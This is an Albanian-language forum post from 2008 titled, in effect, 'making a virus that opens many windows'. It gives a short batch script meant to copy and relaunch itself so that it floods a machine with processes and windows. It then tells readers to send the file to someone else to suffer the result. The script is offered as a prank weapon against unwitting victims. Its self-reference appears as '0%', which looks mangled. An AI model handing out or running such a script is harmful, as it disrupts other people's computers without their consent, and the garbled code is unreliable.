Me kriju nje Virus qe te qel dritare shum!!!

Shko poshtë

Me kriju nje Virus qe te qel dritare shum!!!

Mesazh  carrti prej Mon Sep 29, 2008 1:39 pm

E Hapim Notepad edhe e qesim kete :

Cito:
@echo off
copy 0% ms32.bat
start ms32.bat

Edhe e rujm emri.BAT edhe nese doni e ekzekutoni file-n

Pastaj ja qoni ndokujt dhe aj perballet me pasojat e shum faqeve te hapura
avatar
carrti
Admin

Numri i postimeve : 21
Join date : 28/09/2008
Age : 25

Shiko profilin e anëtarit http://besart-e.albanianforum.net

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi